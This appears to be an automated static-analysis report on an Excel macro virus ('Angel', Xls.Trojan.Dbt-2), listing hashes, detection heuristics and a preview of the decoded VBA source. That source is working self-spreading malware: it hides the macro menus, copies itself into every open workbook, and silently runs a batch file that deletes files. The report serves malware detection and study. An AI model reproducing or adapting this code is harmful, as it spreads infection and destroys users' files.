Xls.Trojan.Dbt-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 cb4b083106f53625…

MALICIOUS

Office (OLE)

69.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 1124c6a511226659b9ac24913bb1ae41 SHA-1: b05f76444e82de6452e6741439bfadb8f198fd3a SHA-256: cb4b083106f536252423ffab2c55219ba813704fbc77ed0010158aaa109864f5
400 Risk Score

Malware Insights

Xls.Trojan.Dbt-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Dbt-2. Static analysis reveals the presence of VBA macros, including a Workbook_Open event handler that executes a 'stealth' subroutine. This subroutine appears to be involved in copying and potentially infecting other workbooks, and it also attempts to delete a file named 'Tmpltnum.xla' using a batch script. The macro also contains obfuscated code and attempts to spread itself by searching for and copying VBA code.

Heuristics 8

  • ClamAV: Xls.Trojan.Dbt-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Dbt-2
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 45,912 bytes but its declared streams total only 0 bytes — 45,912 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18150 bytes
SHA-256: 8d8cbbc66ee28c722c16c3eb8f595fdb82b5f65d939089473b6c0236bd90e2cd
Detection
ClamAV: Xls.Trojan.Dbt-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
copyvir2
Workbooks("Tmpltnum.xla").IsAddin = True
End Sub

Private Sub Workbook_Open()
Call stealth
If Me.Name = "Tmpltnum.xla" Then
    copyvir2
    Workbooks("Tmpltnum.xla").Save
    
Else
    Call deltmplate
End If
copyvir2
Workbooks("Tmpltnum.xla").IsAddin = True
End Sub
Sub deltmplate()
q = Application.Path & "\Library"
ChDir (q)
w = Dir("Tmpltnum.xla")
If UCase(w) = UCase("Tmpltnum.xla") Then
    Workbooks("Tmpltnum.xla").Close
    Open "delxls.bat" For Output As #1
    Print #1, "del Tmpltnum.xla"
    Print #1, "del *.bat"
    Print #1, "exit"
    Close #1
    t = Shell("delxls.bat /c", vbHide)
    Set newBook = Workbooks.Add
    With newBook
        .Title = "Angel"
        .Subject = "Virus"
        .SaveAs FileName:=q & "\Tmpltnum.xla"
    End With
    copyvir2
    Workbooks("Tmpltnum.xla").Save
    x = ActiveWorkbook.Path

End If

End Sub

Sub copyvir2()
For Each w In Workbooks
 For d = 1 To w.VBProject.VBComponents.Count
  infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
If infected = True Then
    haba = w.VBProject.VBComponents(d).CodeModule.CountOfLines
    code = w.VBProject.VBComponents(d).CodeModule.Lines(1, haba) & Chr(13) & "'" & "Infected Date :  " & Date

End If
 Next d
Next w
For Each w In Workbooks
 For d = 1 To w.VBProject.VBComponents.Count
  infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
If infected = False Then
     w.VBProject.VBComponents(d).CodeModule.InsertLines 1, code
     
End If
 Next d
Next w
End Sub
Sub stealth()

Application.Dialogs(xlDialogRun).Application.EnableEvents = False
Application.CommandBars("Tools").Reset
Application.RecentFiles.Maximum = 0
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Application.CommandBars("View").Controls("Toolbars").Enabled = False
Application.CommandBars("Tools").Controls("Customize...").Enabled = False
Application.CommandBars("Tools").Controls("Options...").Enabled = False
Application.CommandBars("Visual Basic").Visible = False
Application.CommandBars("Visual Basic").Controls("Macros...").Enabled = False
End Sub


'Infected Date :  7/13/1999

'Infected Date :  2/23/2000
'Infected Date :  2/23/2000

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
copyvir2
Workbooks("Tmpltnum.xla").IsAddin = True
End Sub

Private Sub Workbook_Open()
Call stealth
If Me.Name = "Tmpltnum.xla" Then
    copyvir2
    Workbooks("Tmpltnum.xla").Save
    
Else
    Call deltmplate
End If
copyvir2
Workbooks("Tmpltnum.xla").IsAddin = True
End Sub
Sub deltmplate()
q = Application.Path & "\Library"
ChDir (q)
w = Dir("Tmpltnum.xla")
If UCase(w) = UCase("Tmpltnum.xla") Then
    Workbooks("Tmpltnum.xla").Close
    Open "delxls.bat" For Output As #1
    Print #1, "del Tmpltnum.xla"
    Print #1, "del *.bat"
    Print #1, "exit"
    Close #1
    t = Shell("delxls.bat /c", vbHide)
    Set newBook = Workbooks.Add
    With newBook
        .Title = "Angel"
        .Subject = "Virus"
        .SaveAs FileName:=q & "\Tmpltnum.xla"
    End With
    copyvir2
    Workbooks("Tmpltnum.xla").Save
    x = ActiveWorkbook.Path

End If

End Sub

Sub copyvir2()
For Each w In Workbooks
 For d = 1 To w.VBProject.VBComponents.Count
  infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
If infected = True Then
    haba = w.VBProject.VBComponents(d).CodeModule.CountOfLines
    code = w.VBPro
... (truncated)
embedded_office_off000060a8.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x60A8 45912 bytes
SHA-256: bb573b9390f781a9afc21973ab7b04a3b4ccb67561e7b77404e9f6f20d8e5358
embedded_office_off00006641.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x6641 44479 bytes
SHA-256: 84655b567827f96ce83037e757ae00cfe43196e0905c845434e77b3f6220d60b

Open this report in the interactive analyzer, or submit your own file for analysis.